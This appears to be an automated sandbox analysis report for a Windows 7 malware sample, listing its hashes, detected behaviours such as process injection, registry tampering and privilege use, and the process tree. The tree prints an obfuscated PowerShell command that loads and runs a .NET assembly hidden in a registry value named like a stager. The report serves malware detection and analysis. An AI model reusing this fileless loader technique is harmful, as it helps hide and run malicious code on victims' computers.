Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
16-05-2024 01:47
Static task
static1
Behavioral task
behavioral1
Sample
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe
Resource
win7-20240221-en
General
-
Target
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe
-
Size
4.5MB
-
MD5
133fda00a490e613f3a6c511c1c660eb
-
SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
-
SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
-
SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
-
SSDEEP
24576:ypPiRcjGOOiX3Sl9L7MupXdagdle6whTeo5A4T9W+xjaCsyfwUmvHX+ODvz8JQDm:
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3388 created 432 3388 powershell.EXE 5 -
Executes dropped EXE 1 IoCs
pid Process 3260 $773dd258 -
Loads dropped DLL 1 IoCs
pid Process 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2184 set thread context of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 3388 set thread context of 3492 3388 powershell.EXE 32 -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b03b6e2133a7da01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3388 powershell.EXE 3388 powershell.EXE 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe 3492 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe Token: SeDebugPrivilege 3388 powershell.EXE Token: SeDebugPrivilege 3388 powershell.EXE Token: SeDebugPrivilege 3492 dllhost.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 2184 wrote to memory of 3260 2184 cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe 28 PID 3352 wrote to memory of 3388 3352 taskeng.exe 30 PID 3352 wrote to memory of 3388 3352 taskeng.exe 30 PID 3352 wrote to memory of 3388 3352 taskeng.exe 30 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3388 wrote to memory of 3492 3388 powershell.EXE 32 PID 3492 wrote to memory of 432 3492 dllhost.exe 5 PID 3492 wrote to memory of 476 3492 dllhost.exe 6 PID 3492 wrote to memory of 492 3492 dllhost.exe 7 PID 3492 wrote to memory of 500 3492 dllhost.exe 8 PID 3492 wrote to memory of 604 3492 dllhost.exe 9 PID 3492 wrote to memory of 684 3492 dllhost.exe 10 PID 3492 wrote to memory of 756 3492 dllhost.exe 11 PID 3492 wrote to memory of 816 3492 dllhost.exe 12 PID 3492 wrote to memory of 860 3492 dllhost.exe 13 PID 3492 wrote to memory of 972 3492 dllhost.exe 15 PID 3492 wrote to memory of 280 3492 dllhost.exe 16 PID 3492 wrote to memory of 344 3492 dllhost.exe 17 PID 3492 wrote to memory of 1072 3492 dllhost.exe 18 PID 3492 wrote to memory of 1116 3492 dllhost.exe 19 PID 3492 wrote to memory of 1176 3492 dllhost.exe 20 PID 3492 wrote to memory of 1208 3492 dllhost.exe 21 PID 3492 wrote to memory of 2136 3492 dllhost.exe 24 PID 3492 wrote to memory of 2128 3492 dllhost.exe 25 PID 3492 wrote to memory of 2184 3492 dllhost.exe 27 PID 3492 wrote to memory of 3352 3492 dllhost.exe 29
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{618df204-c18d-42ee-b037-9d2d4814101d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3492
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:684
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:756
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1176
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:860
-
C:\Windows\system32\taskeng.exetaskeng.exe {2DE9B01A-34BB-44A1-832B-B88E330A60EF} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+'t'+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3388
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:972
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:344
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1072
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2136
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2128
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe"C:\Users\Admin\AppData\Local\Temp\cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169.exe"2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Users\Admin\AppData\Local\Temp\$773dd258"C:\Users\Admin\AppData\Local\Temp\$773dd258"3⤵
- Executes dropped EXE
PID:3260
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.5MB
MD5133fda00a490e613f3a6c511c1c660eb
SHA1e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
SHA512f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd